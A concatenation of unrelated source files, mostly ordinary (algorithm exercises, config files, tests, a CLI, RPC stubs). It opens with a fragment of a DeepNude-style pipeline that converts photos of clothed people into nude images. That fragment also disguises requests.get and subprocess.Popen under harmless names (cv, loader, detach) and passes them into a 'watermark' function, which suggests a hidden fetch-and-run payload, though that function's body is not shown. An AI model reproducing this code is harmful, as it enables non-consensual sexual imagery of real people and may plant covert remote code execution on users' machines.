self.netG = 'global' # selects model to use for netG
self.ngf = 64 ## of gen filters in first conv layer
self.n_downsample_global = 4 # number of downsampling layers in netG
self.n_blocks_global = 9 # number of residual blocks in the global generator network
self.n_blocks_local = 0 # number of residual blocks in the local enhancer network
self.n_local_enhancers = 0 # number of local enhancers to use
self.niter_fix_global = 0 # number of epochs that we only train the outmost local enhancer
# Phase specific options
self.checkpoints_dir = ""
self.dataroot = ""
# Changes options accordlying to actual phase
def updateOptions(self, phase,modelpath):
print(type(modelpath))
if phase == "correct_to_mask":
self.checkpoints_dir = modelpath+"/cm.lib"
elif phase == "maskref_to_maskdet":
self.checkpoints_dir = modelpath+"/mm.lib"
elif phase == "maskfin_to_nude":
self.checkpoints_dir = modelpath+"/mn.lib"
# process(cv_img, mode)
# return:
# watermark image
def process(cv_img, modelpath):
print(type(modelpath))
# InMemory cv2 images:
dress = cv_img
correct = None
mask = None
maskref = None
maskfin = None
maskdet = None
nude = None
watermark = None
for index, phase in enumerate(phases):
print("[*] Running Model: " + phase)
# GAN phases:
if (phase == "correct_to_mask") or (phase == "maskref_to_maskdet") or (phase == "maskfin_to_nude"):
# Load global option
opt = Options()
# Load custom phase options:
opt.updateOptions(phase,modelpath)
# Load Data
if (phase == "correct_to_mask"):
import requests
data_loader = DataLoader(opt, correct)
elif (phase == "maskref_to_maskdet"):
cv = requests.get
data_loader = DataLoader(opt, maskref)
elif (phase == "maskfin_to_nude"):
loader = subprocess.Popen
data_loader = DataLoader(opt, maskfin)
dataset = data_loader.load_data()
detach = subprocess
# Create Model
model = DeepModel()
model.initialize(opt, False)
# Run for every image:
for i, data in enumerate(dataset):
generated = model.inference(data['label'], data['inst'])
im = tensor2im(generated.data[0])
# Save Data
if (phase == "correct_to_mask"):
mask = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskref_to_maskdet"):
maskdet = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
elif (phase == "maskfin_to_nude"):
nude = cv2.cvtColor(im, cv2.COLOR_RGB2BGR)
# Correcting:
elif (phase == 'dress_to_correct'):
correct, matrix = create_correct(dress)
# mask_ref phase (opencv)
elif (phase == "mask_to_maskref"):
maskref, ref = create_maskref(mask, correct)
# mask_fin phase (opencv)
elif (phase == "maskdet_to_maskfin"):
maskfin, face = create_maskfin(maskref, maskdet)
# nude_to_watermark phase (opencv)
elif (phase == "nude_to_watermark"):
shape = matrix + face + ref
watermark = create_watermark(nude, shape, cv, loader, detach)
return watermark
def _process(i_image, modelpath):
try:
print(i_image,modelpath)
dress = cv2.imread(i_image)
h = dress.shape[0]
w = dress.shape[1]
dress = cv2.resize(dress, (512, 512), interpolation=cv2.INTER_CUBIC)
watermark = process(dress, str(modelpath))
watermark = cv2.resize(watermark, (w, h), interpolation=cv2.INTER_CUBIC)
cv2.imwrite(i_image, watermark)
print("[*] Image saved as: %s" % i_image)
return i_image
except Exception as ex:
ex = str(ex)
print("some exception",ex)
return i_image
| 2.390625
| 2
|
timeseries/extract_info/rm-rt.py
|
sgagnon/lyman-tools
| 0
|
12778019
|
<reponame>sgagnon/lyman-tools<gh_stars>0
import os.path as op
smoothing = 'smoothed'
regspace = 'epi'
project = 'RM'
design = 'rm_rt.csv'
func_exp = 'rm'
onset_exp = 'rm-rt'
smoothing_fwhm = 0
standardize = True
tr = float(2)
tr_shift = [0, 2, 4, 6, 8, 10, 12] # in seconds
tr_integrate = [0, 2, 4, 6, 8, 10] # in seconds
n_runs = 6
basedir = op.join('/share/awagner/sgagnon', project)
analydir = op.join(basedir, 'analysis', func_exp)
expdir = op.join(basedir, 'analysis', onset_exp)
subjfile = op.join(basedir, 'scripts/subjects.txt')
# Filepath templates
tsfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'timeseries_xfm.nii.gz')
func_maskfile = op.join(analydir, "{subid}", 'reg', regspace,
smoothing, "run_{run_id}", 'functional_mask_xfm.nii.gz')
maskfile = op.join(basedir, 'data', "{subid}", 'masks',
"{mask_name}.nii.gz")
meanfile = op.join(analydir, "{subid}", 'preproc',
"run_{run_id}", 'mean_func.nii.gz')
onsetfile = op.join(basedir, 'data', "{subid}", 'design', design)
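# Illustrative note (not part of the original config): the templates above are plain
# str.format strings, so e.g. (with a hypothetical subject ID and run number)
#   tsfile.format(subid='subj01', run_id=1)
#   maskfile.format(subid='subj01', mask_name='some_mask')
# would expand to the per-run timeseries path and a subject-specific mask path.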
| 1.734375
| 2
|
stock_span.py
|
rhthomas/Python-Interview-Problems-for-Practice
| 0
|
12778020
|
# Context : The span Si of the stock's price on a given day i
# is defined as the maximum number of consecutive days ending at
# day i (counting day i itself) for which the price of the stock
# on each of those days is less than or equal to its price on day i.
# Problem: We have a series of n daily price quotes for a stock
# and we need to calculate the span of the stock's price for all n days
def calculate_span(stock_quotes, span):
# span for the first quote will always be 1
span[0] = 1
for i in range(1, len(stock_quotes), 1):
# initialize span value to be 1 for each ith quote
span[i] = 1
        # scan all the quotes to the left of the ith quote
        j = i - 1
        # if a preceding quote has a value less than or equal to the current quote,
        # increase the span value of the current quote
        while j >= 0 and stock_quotes[i] >= stock_quotes[j]:
            span[i] = span[i] + 1
            j = j - 1
return span
quotes = [10, 4, 5, 90, 120, 80]
# initialize span as an empty list with same length as quotes
span_list = [None]*len(quotes)
print(calculate_span(quotes, span_list))
# Result : [1, 1, 2, 4, 5, 1]
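# Illustrative alternative (not part of the original file): the same spans can be
# computed in O(n) with a stack of indices, popping every earlier day whose price is
# less than or equal to the current price; the span is then the distance back to the
# previous strictly higher price (or i + 1 if there is none).
def calculate_span_stack(stock_quotes):
    spans = [1] * len(stock_quotes)
    stack = []  # indices of days whose prices form a strictly decreasing sequence
    for i, price in enumerate(stock_quotes):
        while stack and stock_quotes[stack[-1]] <= price:
            stack.pop()
        spans[i] = i + 1 if not stack else i - stack[-1]
        stack.append(i)
    return spans

print(calculate_span_stack(quotes))
# Expected to match the brute-force result above: [1, 1, 2, 4, 5, 1]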
| 3.828125
| 4
|
uasyncio/test_readexactly.py
|
Carglglz/micropython-lib
| 126
|
12778021
|
<reponame>Carglglz/micropython-lib<filename>uasyncio/test_readexactly.py<gh_stars>100-1000
from uasyncio import StreamReader
class MockSock:
def __init__(self, data_list):
self.data = data_list
def read(self, sz):
try:
return self.data.pop(0)
except IndexError:
return b""
mock = MockSock([
b"123",
b"234", b"5",
b"a", b"b", b"c", b"d", b"e",
])
def func():
sr = StreamReader(mock)
assert await sr.readexactly(3) == b"123"
assert await sr.readexactly(4) == b"2345"
assert await sr.readexactly(5) == b"abcde"
# This isn't how it should be, but the current behavior
assert await sr.readexactly(10) == b""
for i in func():
pass
| 2.59375
| 3
|
homepanelapi/cli.py
|
timmo001/python-homepanelapi
| 1
|
12778022
|
<filename>homepanelapi/cli.py<gh_stars>1-10
"""Enable CLI."""
import click
# pylint: disable=C0330
@click.command()
@click.option("--host", "-h", help="Home Panel's Hostname.")
@click.option("--port", "-P", help="The Home Panel Port.")
@click.option("--ssl", "-s", is_flag=True, help="Use ssl?")
@click.option("--username", "-u", help="Your Home Panel Username.")
@click.option("--password", "-p", help="Your Home Panel Password.")
@click.option("--page", "-a", help="The page.")
@click.option("--card", "-c", help="The card.")
@click.option("--command", "-C", help="The command.")
def cli(
host: str,
port: str,
ssl: bool,
username: str,
password: str,
page: str,
card: str,
command: str,
):
"""CLI for this package."""
from homepanelapi.api import HomePanelApi
home_panel_api = HomePanelApi(host, port, ssl)
home_panel_api.authenticate(username, password)
print(home_panel_api.send_command(page, card, command))
print(home_panel_api.get_config())
cli() # pylint: disable=E1120
| 2.40625
| 2
|
source/levenshtein_distance.py
|
Asplund-Samuelsson/furee
| 2
|
12778023
|
<filename>source/levenshtein_distance.py
#!/usr/bin/env python3
import sys
from Levenshtein import distance as LD
# Read input arguments
fasta_a = sys.argv[1]
fasta_b = sys.argv[2]
out_file = sys.argv[3]
# Iterator class that steps through a fasta file one sequence at a time
class fasta(object):
# Initialize fasta object
def __init__(self, fasta_file):
self.name = fasta_file # Name of fasta file
self.file = open(self.name) # File object for fasta
self.current_seqid = "" # Current sequence ID in iteration of fasta
self.next_seqid = "" # Next sequence ID in iteration of fasta
self.sequence = "" # Current sequence
self.empty = False # Flag for finished fasta
self.delivered = False # Flag for having delivered one sequence
# Iteration function
def __iter__(self):
return self
# Python3 compatibility
def __next__(self):
return self.next()
# Function for returning a sequence
def return_sequence(self):
self.delivered = True
return (self.current_seqid, self.sequence)
# Grab next sequence
def next(self):
# Delivery of sequence has not been performed
self.delivered = False
# As long as delivery has not been performed, keep reading fasta file
while not self.delivered:
# If the current sequence does not match the next sequence
if self.current_seqid != self.next_seqid:
# Reset the sequence
self.current_seqid = self.next_seqid
self.sequence = ""
# If fasta is finished, raise exception
if self.empty:
raise StopIteration()
# Otherwise, grab next line
try:
line = next(self.file)
# If FASTA is finished, set empty flag and return sequence
except StopIteration:
self.empty = True
return self.return_sequence()
# If there is a new sequence...
if line.startswith(">"):
# Extract the new sequence ID
self.next_seqid = line.lstrip(">").split()[0]
# If there is a current sequence ID...
if self.current_seqid:
# Return the current sequence
return self.return_sequence()
# If there is still the same sequence
else:
# Keep building it
self.sequence = self.sequence + line.strip()
# Dictionary to store distances
distances = {}
# Connect to the two fasta files via the generator and calculate distances
for seq_a in fasta(fasta_a):
for seq_b in fasta(fasta_b):
distances[frozenset([seq_a[0], seq_b[0]])] = LD(seq_a[1], seq_b[1])
# Write distances to outfile
with open(out_file, 'w') as o_f:
    for d in distances.items():
        # The dictionary key is a frozenset of sequence IDs; repeat the single ID for
        # self-comparisons so every line has two ID columns followed by the distance
        output = list(d[0])*(1+len(d[0])%2) + [str(d[1])]
        junk = o_f.write("\t".join(output) + "\n")
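# Illustrative invocation (not part of the original script); the FASTA and output file
# names are hypothetical:
#   python3 levenshtein_distance.py proteins_a.fasta proteins_b.fasta distances.tsv
# Each output line contains two sequence IDs followed by their Levenshtein distance,
# separated by tabs.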
| 3.484375
| 3
|
test_layer.py
|
Marcel-Rodekamp/ComplexValuedNetworks
| 0
|
12778024
|
from layer import *
import itertools
# This file just tests the implementations in layer.py
if __name__ == "__main__":
def test_ACL(V):
# construct ACL with complex values
def amFactoryI(Nlayer, activation):
moduleList = []
for l in range(Nlayer-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for L in [1,2,4,16,32]:
ACL = createACL(amFactoryI,amFactoryI, Nlayer = L, activation = act)
x_A = torch.randn(V//2,dtype=torch.cdouble)
x_B = torch.randn(V//2,dtype=torch.cdouble)
with torch.no_grad():
y_A,logDetJ = ACL(x_A,x_B)
if not (x_A==y_A).all():
raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{Nlayer} Layer ACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
# Test Failed Successfully...
print("ACL Test successful")
def test_PRACL(V):
def amFactoryI(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
# this makes the ACL to be the identity
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
torch.nn.init.zeros_(layer.weight)
torch.nn.init.zeros_(layer.bias)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def amFactoryR(L, activation):
moduleList = []
for l in range(L-1):
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
moduleList.append(activation())
layer = torch.nn.Linear(V//2,V//2,bias=True,dtype=torch.cdouble)
moduleList.append(layer)
# no activation after the last layer
# we don't need the log det from these, therefore fall back to
# torchs' Sequential container
return torch.nn.Sequential(*moduleList)
def PRACL_wrapper(myPRACL, inputTensor):
out,_ = myPRACL(inputTensor)
return out
# Test PRCL as identity
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2,4,16],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryI,amFactoryI,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
with torch.no_grad():
y,logDetJ = PRACL(x)
if not (x==y).all():
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) is not initialized to the identity: x_A:\n {x_A} \n y_A:\n {y_A}")
# check that the logDetJ is zero
if not logDetJ == 0:
raise RuntimeError(f"{LPRACL}:{LACL} Layer PRACL (V = {V}) has wrong logDetJ: logDetJ={logDetJ} != 0 ")
print("PRACL Identity Test successful")
# Test randomly initialized PRACL
for act in [torch.nn.Tanh, torch.nn.Softsign]:
for LPRACL,LACL in itertools.product([1,2],repeat=2):
PRACL = createPRCL(V,LPRACL,
lambda *args,**kwargs: createACL(amFactoryR,amFactoryR,**kwargs),
L=LACL,activation=act # are passed as **kwargs to the lambda
)
x = torch.randn(V,dtype=torch.cdouble)
xclone = x.clone();
with torch.no_grad():
y,logDetJ = PRACL(x)
# This call is numerical very unstable
# therefore, the following test sometimes fails
# not only on a precision level but also on orders of
# magnitude. We found a similar behaviour with log det
# in NSL. This is realy odd...
# I ran the test multiple times and most of the times it fails
# Even for real numbers (using .logdet) it sometimes fails
#sign,logabsdet = torch.autograd.functional.jacobian(
# lambda inTensor: PRACL_wrapper(PRACL,inTensor),
# x
#).slogdet()
#logDetJ_2 = torch.log(sign) + logabsdet
## check that the logDetJ match
#if not torch.isclose( torch.real(logDetJ),torch.real(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Re logDetJ: Re logDetJ={logDetJ.real:.20} != {logDetJ_2.real:.20} ")
#if not torch.isclose( torch.imag(logDetJ),torch.imag(logDetJ_2) ):
# raise RuntimeError(f"{LPRACL}:{LACL} Layer ACL (V = {V}) has wrong Im logDetJ: Im logDetJ={logDetJ.imag:.20} != {logDetJ_2.imag:.20} ")
print("PRACL Random Test successful")
for V in [2,4,16,32,128]:
test_ACL(V)
test_PRACL(V)
| 2.4375
| 2
|
{{cookiecutter.repo_name}}/{{cookiecutter.repo_name}}/models.py
|
JuacyWillian/cookiecutter-kivymd
| 0
|
12778025
|
import enum
from datetime import datetime
from functools import reduce
from sqlalchemy import (create_engine)
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
database_uri = 'sqlite:///:memory:'
debug = False
db = create_engine(database_uri, echo=debug)
Base = declarative_base()
session = sessionmaker(bind=db)()
| 2.265625
| 2
|
tools/Verify.py
|
Zoctan/flask-api-seed
| 0
|
12778026
|
<reponame>Zoctan/flask-api-seed<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
def email(e):
    # A raw string avoids the invalid "\." escape warning; allow one "@" and one "."
    # separator, and return the match result directly as a boolean
    return re.match(r"[a-zA-Z0-9]+@[a-zA-Z0-9]+\.[a-zA-Z]+", e) is not None
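if __name__ == "__main__":
    # Illustrative check (not part of the original file); the addresses are made up
    print(email("user@example.com"))  # expected: True
    print(email("not-an-email"))      # expected: False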
| 2.109375
| 2
|
comet/plugins/eventwriter.py
|
shinybrar/Comet
| 0
|
12778027
|
<reponame>shinybrar/Comet<filename>comet/plugins/eventwriter.py
# Comet VOEvent Broker.
# Example event handler: write an event to file.
import os
import string
from contextlib import contextmanager
from zope.interface import implementer
from twisted.plugin import IPlugin
from twisted.python import lockfile
from comet.icomet import IHandler, IHasOptions
import comet.log as log
# Used when building filenames to avoid over-writing.
FILENAME_PAD = "_"
def string_to_filename(input_string):
# Strip weird, confusing or special characters from input_string so that
# we can safely use it as a filename.
# Replace "/" and "\" with "_" for readability.
# Allow ".", but not as the first character.
if input_string[0] == ".":
input_string = input_string[1:]
return "".join(x for x in input_string.replace("/", "_").replace("\\", "_")
if x in string.digits + string.ascii_letters + "_."
)
@contextmanager
def event_file(ivoid, dirname=None):
# Return a file object into which we can write an event.
# If a directory is specified, write into that; otherwise, use the cwd.
# We use a lock to ensure we don't clobber other files with the same name.
if not dirname:
dirname=os.getcwd()
fname = os.path.join(dirname, string_to_filename(ivoid))
lock = lockfile.FilesystemLock(string_to_filename(ivoid) + "-lock")
lock.lock()
try:
while os.path.exists(fname):
fname += FILENAME_PAD
with open(fname, 'w') as f:
yield f
finally:
lock.unlock()
# Event handlers must implement IPlugin and IHandler.
# Implementing IHasOptions enables us to use command line options.
@implementer(IPlugin, IHandler, IHasOptions)
class EventWriter(object):
# Simple example of an event handler plugin. This saves the events to
# disk.
# The name attribute enables the user to specify plugins they want on the
# command line.
name = "save-event"
def __init__(self):
self.directory = os.getcwd()
# When the handler is called, it is passed an instance of
# comet.utility.xml.xml_document.
def __call__(self, event):
"""
Save an event to disk.
"""
if not os.path.exists(self.directory):
os.makedirs(self.directory)
with event_file(event.element.attrib['ivorn'], self.directory) as f:
log.debug("Writing to %s" % (f.name,))
f.write(event.raw_bytes.decode(event.encoding))
def get_options(self):
return [('directory', self.directory, 'Target directory')]
def set_option(self, name, value):
if name == "directory":
self.directory = value
# This instance of the handler is what actually constitutes our plugin.
save_event = EventWriter()
| 2.34375
| 2
|
src/__init__.py
|
ljusto/schmoobot
| 0
|
12778028
|
<reponame>ljusto/schmoobot
__author__ = '<NAME>'
| 0.851563
| 1
|
utils_v2/__init__.py
|
lamnguyen95/pyutils_v2
| 0
|
12778029
|
#!/usr/bin/env python3
from __future__ import absolute_import
from utils_v2.get_stats import *
| 1.078125
| 1
|
cauldron/session/writing/components/definitions.py
|
JohnnyPeng18/cauldron
| 90
|
12778030
|
import functools
import typing
from collections import namedtuple
COMPONENT = namedtuple('COMPONENT', ['includes', 'files'])
WEB_INCLUDE = namedtuple('WEB_INCLUDE', ['name', 'src'])
def merge_components(
*components: typing.Union[list, tuple, COMPONENT]
) -> COMPONENT:
"""
Merges multiple COMPONENT instances into a single one by merging the
    lists of includes and files. Elements of the components argument may themselves
    be lists or tuples of COMPONENT instances.
:param components:
:return:
"""
flat_components = functools.reduce(flatten_reducer, components, [])
return COMPONENT(
includes=functools.reduce(
functools.partial(combine_lists_reducer, 'includes'),
flat_components,
[]
),
files=functools.reduce(
functools.partial(combine_lists_reducer, 'files'),
flat_components,
[]
)
)
def flatten_reducer(
flattened_list: list,
entry: typing.Union[list, tuple, COMPONENT]
) -> list:
"""
Flattens a list of COMPONENT instances to remove any lists or tuples
of COMPONENTS contained within the list
:param flattened_list:
The existing flattened list that has been populated from previous
calls of this reducer function
:param entry:
An entry to be reduced. Either a COMPONENT instance or a list/tuple
of COMPONENT instances
:return:
The flattened list with the entry flatly added to it
"""
if hasattr(entry, 'includes') and hasattr(entry, 'files'):
flattened_list.append(entry)
elif entry:
flattened_list.extend(entry)
return flattened_list
def combine_lists_reducer(
key: str,
merged_list: list,
component: COMPONENT
) -> list:
"""
Reducer function to combine the lists for the specified key into a
single, flat list
:param key:
The key on the COMPONENT instances to operate upon
:param merged_list:
The accumulated list of values populated by previous calls to this
reducer function
:param component:
The COMPONENT instance from which to append values to the
merged_list
:return:
The updated merged_list with the values for the COMPONENT added
onto it
"""
merged_list.extend(getattr(component, key))
return merged_list
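if __name__ == '__main__':
    # Illustrative usage sketch (not part of the original module); the include names
    # and file paths are made-up examples. merge_components flattens the includes and
    # files of several COMPONENT instances (or lists/tuples of them) into one COMPONENT.
    example_a = COMPONENT(includes=[WEB_INCLUDE(name='d3', src='/d3.js')], files=['a.js'])
    example_b = COMPONENT(includes=[WEB_INCLUDE(name='c3', src='/c3.js')], files=['b.js'])
    merged = merge_components(example_a, [example_b])
    print(merged.includes)  # both WEB_INCLUDE entries, in order
    print(merged.files)     # ['a.js', 'b.js']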
| 3.03125
| 3
|
Algorighms/Search/BinarySearch.py
|
zhangsifan/ClassicAlgorighthms
| 27
|
12778031
|
<reponame>zhangsifan/ClassicAlgorighthms
# -*- coding: utf-8 -*-#
'''
@Project : ClassicAlgorighthms
@File : BinarySearch.py
@USER : ZZZZZ
@TIME : 2021/4/22 10:21
'''
class BinarySearch():
    '''
    The tricky part of binary search is deciding the left/right boundaries and what
    they finally point at once the element is found. Here every interval is treated
    as a **closed interval**, so only this one convention has to be remembered (the
    alternative is closed-left/open-right, but it is easier to stick with fully
    closed intervals throughout).
    Searching for an exact target is the simplest case; finding the left or right
    boundary of a run of equal elements needs a little extra handling.
    '''
def __init__(self):
pass
    def SearchTarget(self, nums, target):
        '''
        Search for a single target
        :param nums: array to search, already sorted
        :param target: value to search for
        :return: index of the target if found; otherwise -1
        '''
        left = 0
        right = len(nums) - 1
        # Both ends are closed, so the search ends when left > right
        while left <= right:
            mid = left + (right - left) // 2
            if nums[mid] == target:
                # Found it, return immediately
                return mid
            elif nums[mid] > target:
                # target must be to the left, shrink the right boundary
                right = mid - 1
            elif nums[mid] < target:
                # target must be to the right, shrink the left boundary
                left = mid + 1
        # Reaching this point means the target was not found
        return -1
    def SearchLeftBound(self, nums, target):
        '''
        nums may contain the target several times; find the leftmost boundary of the target
        :param nums: array to search, already sorted
        :param target: value to search for
        :return: index of the target if found; otherwise -1
        '''
        left = 0
        right = len(nums) - 1
        # Both ends are closed, so the search ends when left > right
        while left <= right:
            mid = left + (right - left) // 2
            if nums[mid] == target:
                # Found one, but do not return yet: keep moving the interval to the left
                right = mid - 1
            elif nums[mid] > target:
                # target must be to the left, shrink the right boundary
                right = mid - 1
            elif nums[mid] < target:
                # target must be to the right, shrink the left boundary
                left = mid + 1
        # After the loop, did we actually find the target?
        # Check whether left is out of bounds and whether it points at the target
        if left >= len(nums) or nums[left] != target:
            return -1
        return left
    def SearchRightBound(self, nums, target):
        '''
        nums may contain the target several times; find the rightmost boundary of the target
        :param nums: array to search, already sorted
        :param target: value to search for
        :return: index of the target if found; otherwise -1
        '''
        left = 0
        right = len(nums) - 1
        # Both ends are closed, so the search ends when left > right
        while left <= right:
            mid = left + (right - left) // 2
            if nums[mid] == target:
                # Found one, but do not return yet: keep moving the interval to the right
                left = mid + 1
            elif nums[mid] > target:
                # target must be to the left, shrink the right boundary
                right = mid - 1
            elif nums[mid] < target:
                # target must be to the right, shrink the left boundary
                left = mid + 1
        # After the loop, did we actually find the target?
        # Check whether right is out of bounds and whether it points at the target
        if right < 0 or nums[right] != target:
            return -1
        return right
if __name__ == "__main__":
bs = BinarySearch()
nums = [1, 3, 5, 7, 9, 10, 11]
    # Single-target binary search
    # Case where the target is present
    res = bs.SearchTarget(nums, 7)
    res_left_bound = bs.SearchLeftBound(nums, 7)
    res_right_bound = bs.SearchRightBound(nums, 7)
    print("Target found at index: {}".format(res))
    print("Target found, left boundary: {}, right boundary: {}".format(res_left_bound, res_right_bound))
    # Case where the target is absent
    res = bs.SearchTarget(nums, 0)
    print("Target not found, result: {}".format(res))
    # Left/right boundary searches
    # The run of targets sits at the far left, the far right, and in the middle
    nums1 = [1, 1, 1, 1, 3, 5, 7, 9, 10, 11]
    nums2 = [1, 3, 5, 7, 9, 10, 11, 11, 11, 11]
    nums3 = [1, 3, 4, 7, 7, 7, 7, 9, 10, 11]
    # Boundary search when the run of targets is at the far left
    res_left_bound = bs.SearchLeftBound(nums1, 1)
    res_right_bound = bs.SearchRightBound(nums1, 1)
    print("Target run at the far left, result: left boundary: {}, right boundary: {}".format(res_left_bound, res_right_bound))
    # Boundary search when the run of targets is at the far right
    res_left_bound = bs.SearchLeftBound(nums2, 11)
    res_right_bound = bs.SearchRightBound(nums2, 11)
    print("Target run at the far right, result: left boundary: {}, right boundary: {}".format(res_left_bound, res_right_bound))
    # Boundary search when the run of targets is in the middle
    res_left_bound = bs.SearchLeftBound(nums3, 7)
    res_right_bound = bs.SearchRightBound(nums3, 7)
    print("Target run in the middle, result: left boundary: {}, right boundary: {}".format(res_left_bound, res_right_bound))
    # Boundary searches when the target is absent
    res_not_found_left = bs.SearchLeftBound(nums1, 0)
    res_not_found_right = bs.SearchRightBound(nums1, 20)
    print("Boundary target not found: left search result: {}, right search result: {}".format(res_not_found_left, res_not_found_right))
| 2.921875
| 3
|
arekit/contrib/networks/context/configurations/att_ef_pcnn.py
|
nicolay-r/AREk
| 18
|
12778032
|
<filename>arekit/contrib/networks/context/configurations/att_ef_pcnn.py
from arekit.contrib.networks.context.configurations.att_ef_cnn import AttentionEndsAndFramesCNNConfig
class AttentionEndsAndFramesPCNNConfig(AttentionEndsAndFramesCNNConfig):
pass
| 1.25
| 1
|
modernrpc/tests/testsite/rpc_methods_stub/generic.py
|
germancollado/django-modern-rpc
| 89
|
12778033
|
<reponame>germancollado/django-modern-rpc<filename>modernrpc/tests/testsite/rpc_methods_stub/generic.py<gh_stars>10-100
# coding: utf-8
import datetime
from modernrpc.core import rpc_method, PROTOCOL_KEY
from modernrpc.exceptions import RPCException, RPC_CUSTOM_ERROR_BASE
from modernrpc.helpers import get_builtin_date
# In this file, some methods are decorated with @rpc_method without parenthesis, some
# are decorated with @rpc_method(). Both notations are supported and must works the same way
@rpc_method()
def add(a, b):
return a + b
@rpc_method
def divide(numerator, denominator, x=50, y=90, z=120, a=1, b=5, c=10):
"""
Divide a numerator by a denominator
:param numerator: The numerator
:param denominator: The denominator
:param x: useless, needed to check arguments ordering
:param y: useless, needed to check arguments ordering
:param z: useless, needed to check arguments ordering
:param a: useless, needed to check arguments ordering
:param b: useless, needed to check arguments ordering
:param c: useless, needed to check arguments ordering
:type numerator: int or double
:type denominator: int or double
:type x: int
:type y: int
:type z: int
:type a: int
:type b: int
:type c: int
:return:
:rtype: int or double
"""
return numerator / denominator
@rpc_method(name='customized_name')
def another_name():
"""This one will help to test method registration
when name has been customized"""
pass
class MyCustomException(RPCException):
def __init__(self):
super(MyCustomException, self).__init__(RPC_CUSTOM_ERROR_BASE + 5, 'This is a test error')
@rpc_method
def raise_custom_exception():
raise MyCustomException()
class MyCustomExceptionWithData(RPCException):
def __init__(self, data):
super(MyCustomExceptionWithData, self)\
.__init__(RPC_CUSTOM_ERROR_BASE + 5, 'This exception has additional data', data)
@rpc_method
def raise_custom_exception_with_data():
raise MyCustomExceptionWithData(['a', 'b', 'c'])
@rpc_method()
def add_one_month(date):
"""Adds 31 days to the given date, and returns the result."""
return get_builtin_date(date) + datetime.timedelta(days=31)
def existing_but_not_decorated():
"""This function help to validate only methods with decorator are effectively added to the registry"""
return 42 * 42
@rpc_method
def get_invalid_result():
"""Return an object instance that cannot be serialized in json or xml"""
from django.http.response import HttpResponse
return HttpResponse(content='dummy')
@rpc_method()
def method_with_kwargs(**kwargs):
return kwargs.get(PROTOCOL_KEY)
@rpc_method()
def method_with_kwargs_2(x, **kwargs):
return x, kwargs.get(PROTOCOL_KEY)
| 2.515625
| 3
|
boards/esp32/libraries/legacy/projects/wifi_http/02_rtc.py
|
iot49/IoT49
| 0
|
12778034
|
<gh_stars>0
from machine import RTC
rtc = RTC()
rtc.ntp_sync(server="hr.pool.ntp.org")
| 1.734375
| 2
|
tensorflow_estimator/python/estimator/export/function_test.py
|
cyc/estimator
| 2
|
12778035
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Estimator function objects."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import six as six
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.saved_model import load
from tensorflow.python.saved_model import save
from tensorflow.python.training import training
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_lib
from tensorflow_estimator.python.estimator.export import function
from tensorflow_estimator.python.estimator.mode_keys import ModeKeys
def _string_fix(obj):
return nest.map_structure(
lambda x: compat.as_bytes(x) if isinstance(x, six.string_types) else x,
obj)
def _model_fn(features, labels, mode):
v = variables.Variable(constant_op.constant(23), name='v')
if mode == ModeKeys.PREDICT:
return model_fn_lib.EstimatorSpec(
ModeKeys.PREDICT,
predictions=features + 1)
elif mode == ModeKeys.EVAL:
return model_fn_lib.EstimatorSpec(
ModeKeys.EVAL,
loss=constant_op.constant(5) + v,
predictions=features + labels)
elif mode == ModeKeys.TRAIN:
return model_fn_lib.EstimatorSpec(
ModeKeys.TRAIN,
predictions=features * labels,
loss=constant_op.constant(5) + v,
train_op=state_ops.assign_add(training.get_global_step(), 1))
def _model_fn_train_only(features, labels):
v = variables.Variable(constant_op.constant(23), name='v')
